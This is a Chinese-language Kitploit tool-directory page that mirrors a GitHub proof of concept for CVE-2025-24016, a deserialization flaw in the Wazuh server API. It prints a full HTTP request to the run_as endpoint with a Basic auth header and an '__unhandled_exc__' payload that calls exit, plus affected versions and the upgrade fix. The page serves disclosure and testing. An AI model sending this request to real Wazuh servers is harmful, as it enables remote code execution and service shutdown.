Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-24016 — CVE-2025-24016:Wazuh 服务器中的 RCE!远程代码执行 | Kitploit
工具/GitHubGitHub/muhammadwaseem29/cve-2025-24016
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试远程访问工具Payload 开发
GitHubmuhammadwaseem29/cve-2025-24016

CVE-2025-24016

CVE-2025-24016:Wazuh 服务器中的 RCE!远程代码执行

查看仓库
521年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
网站
分享

Wazuh 远程代码执行 (RCE) - 概念验证

漏洞概述

本仓库演示了 Wazuh 服务器中因 wazuh-manager 包中不安全的反序列化引入的远程代码执行 (RCE) 漏洞。该漏洞允许具有 API 访问权限的远程攻击者(受损的仪表盘、集群中的 Wazuh 服务器、或某些配置下被攻破的代理)在服务器上执行任意代码。

受影响版本

  • wazuh-manager 版本 >= 4.4.0
  • 已在版本 >= 4.9.1 中修复

漏洞描述

该漏洞出现在 Wazuh API 中,其中 DistributedAPI 中的参数被序列化为 JSON,并在 framework/wazuh/core/cluster/common.py 文件中使用 as_wazuh_object 进行反序列化。攻击者可以通过向 DAPI 请求中注入未清理的字典来利用此漏洞,这可能导致执行任意 Python 代码。

可以使用 run_as 端点触发 RCE,该端点允许攻击者控制 参数。通过构造恶意请求,可以在主服务器上执行任意代码。

auth_context

概念验证

要使用服务器 API 触发此漏洞,请执行以下步骤。

PoC Burp Suite 请求

  1. 用于触发漏洞的 Burp Suite 请求:
root@kitploit:~
POST /security/user/authenticate/run_as HTTP/1.1
Host: target.com:55000
Cache-Control: max-age=0
Accept-Language: en-US
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.183 Safari/537.36
Accept: application/json
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Authorization: Basic d2F6dXcta3dpTUltUzNjcjM3UDA1MHItOg==  # Base64 编码的 "wazuh-wui:MyS3cr37P450r.*-"
Content-Type: application/json
Content-Length: 83

{
  "__unhandled_exc__": {
    "__class__": "exit",
    "__args__": []
  }
}

解决方案图片

  1. 请求说明:
  • Authorization 头部:这是 base64 编码的授权信息(wazuh-wui:MyS3cr37P450r.*-)。
  • Payload:恶意载荷包含未清理的异常 __unhandled_exc__,它会触发任意 Python 代码(本例中为 exit)的执行。

影响

  • 远程代码执行 (RCE):此漏洞允许攻击者在 Wazuh 服务器上执行任意代码,影响版本 >= 4.4.0 至 4.9.0(尚未修复)。
  • 潜在拒绝服务:在此概念验证中,触发了 exit 函数,导致 Wazuh 服务器关闭。

缓解措施

为保护您的系统,请升级至 Wazuh 版本 >= 4.9.1,该版本已修复此问题。

下载工具